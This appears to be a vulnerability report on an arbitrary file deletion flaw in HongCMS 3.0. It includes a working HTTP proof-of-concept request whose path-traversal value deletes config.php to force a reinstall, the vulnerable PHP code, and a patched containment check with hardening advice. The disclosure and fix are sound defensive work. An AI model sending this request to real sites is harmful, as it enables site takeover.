HongCMS
HongCMS 3.0 - Arbitrary file deletion and reinstall HongCMS
You need to log into the management page and request `http://127.0.0.1/cms/hongcms/admin/index.php/database/ajax?action=delete`, sending the file name in the POST parameter `file=#fileName`. If you delete config.php and then view install/index.php, you will reinstall this CMS! Like this:
```
POST /hongcms-master/admin/index.php/database/ajax?action=delete HTTP/1.1
Host: 127.0.0.1
Content-Length: 31
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost.djx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost.djx/hongcms-master/admin/index.php/database/operate?dbaction=backuptable&tablename=hong_vvc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: page_iframe_url=http://localhost.djx/metinfo/index.php?lang=cn&pageset=1; pgv_pvi=3037471744; MKZsV3Ij2LU7admin=8905d1d3459345510c971293314d67a9
Connection: close

file=../../config/config.php
```
Let's look at the source code. In the local copy of admin/controllers/database.php, lines 38 to 41:

```php
}elseif($action == 'delete'){
	$filename = ForceStringFrom('file');
	if(@unlink($this->backupDir . $filename)){
		// no action
```
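The variable `$action` comes from `$_GET["action"]` and `$filename` comes from `$_POST["file"]`, so the value passed to `unlink()` is appended to the backup directory exactly as the client sent it.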
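
One way to close the traversal shown above, as an added example that is not HongCMS code: reject any name with a directory component, then confirm the resolved path still sits directly inside the backup directory before calling `unlink()`. The function name `safeDeleteBackup()` and the temporary `admin/backup` and `config` layout are hypothetical, constructed for the demo.

```php
<?php
// Added example, not HongCMS code: containment check before unlink().
// safeDeleteBackup() and the directory layout below are hypothetical.

function safeDeleteBackup(string $backupDir, string $filename): bool
{
    // Backup names never need a directory component: reject separators,
    // NUL bytes, empty names and dot-only names outright.
    if ($filename === '' || $filename === '.' || $filename === '..'
        || strpos($filename, "\0") !== false
        || $filename !== basename($filename)) {
        return false;
    }

    // Resolve symlinks and relative parts on both sides of the comparison.
    $base   = realpath($backupDir);
    $target = realpath($backupDir . DIRECTORY_SEPARATOR . $filename);
    if ($base === false || $target === false) {
        return false; // backup directory or file does not exist
    }

    // The resolved file must be a regular file directly inside $base,
    // which also refuses a symlink in the backup dir that points elsewhere.
    if (dirname($target) !== $base || !is_file($target)) {
        return false;
    }
    return unlink($target);
}

// Constructed demo layout: <tmp>/config/config.php and <tmp>/admin/backup/
$root = sys_get_temp_dir() . '/hongcms_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/config', 0700, true);
mkdir($root . '/admin/backup', 0700, true);
file_put_contents($root . '/config/config.php', "<?php // constructed\n");
file_put_contents($root . '/admin/backup/dump_1.sql', "-- constructed\n");
$backupDir = $root . '/admin/backup/';

// The value from the report's request body must be refused,
// and config.php must still exist afterwards.
var_dump(safeDeleteBackup($backupDir, '../../config/config.php'));
var_dump(file_exists($root . '/config/config.php'));

// A plain backup file name inside the directory is still deletable.
var_dump(safeDeleteBackup($backupDir, 'dump_1.sql'));
```

Because deleting config.php is what exposes install/index.php again, removing or blocking the install directory after setup limits the impact of any remaining file-deletion path.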